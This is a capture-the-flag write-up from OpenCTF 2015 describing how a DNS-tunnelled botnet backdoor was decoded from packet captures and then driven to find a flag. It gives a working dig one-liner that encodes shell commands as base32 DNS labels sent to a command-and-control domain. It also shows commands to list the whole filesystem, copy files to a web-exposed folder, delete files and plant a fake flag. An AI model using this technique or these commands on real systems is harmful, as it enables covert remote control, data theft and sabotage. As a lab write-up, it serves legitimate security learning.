OpenCTF 2015 - dnsh (botnet,pwnable 100) Writeup

Hint:

dnsh 100 --- Our IDS picked up this CnC traffic - please ANALyze it - 172.16.18.20/dnsh-985199bc2d4d732db28f8ba1ccfc6702

The provided pcap contains a HTTP request that results in a 404, a bunch of weird DNS queries, followed by the previously 404 request succeeding. Brute force decoding reveals that the DNS queries are a back door shell. The DNS queries are of the form:

{Base32_encoded_command}.{Hex_representation_of_MD5_of_Base32_encded_command}.goatse.cx

Decoding the queries in the pcap shows that the webserver files are in ~/www/files/:

cp /var/www/html/*.swf ~/.
mv *.swf ~/www/files/.

A very quick and dirty script to push commands to the target server was written by Javantea:

dig @10.10.53.53 <base32 string>.$(echo -n <base32 string> |md5sum |head -c 32).goatse.cx

For instance, to run [rm ~/www/files/n*], a necessary step to remove all of our flag files after the challenge is completed, you can run the following command:

dig @10.10.53.53 OJWSA7RPO53XOL3GNFWGK4ZPNYVA.$(echo -n OJWSA7RPO53XOL3GNFWGK4ZPNYVA |md5sum |head -c 32).goatse.cx

Only a small amount of trouble is caused by the length limitations in DNS queries. Unfortunately the flag doesn't seem to be in any obvious locations near CWD, so instead the whole hard drive is scrubbed:

ls -alR / > www/files/neg9.txt

The flag was then found at /var/www/.hide/ctf_flag.txt. At this point we started hitting length limitations in our DNS queries, so a slightly creative command was written to compress it:

cp /var/w*/.h*/c*.txt www/files/n

Requesting the n document revealed the key:

s0m3thing_Cl3veR_ab0u7_b0tn3ts_g03s_her3

This was followed by some light trolling to mess with any teams after us:

echo "th3_c@t_is_#1" > flag.txt

Posted on Aug. 12, 2015, 9:10 a.m. by reidb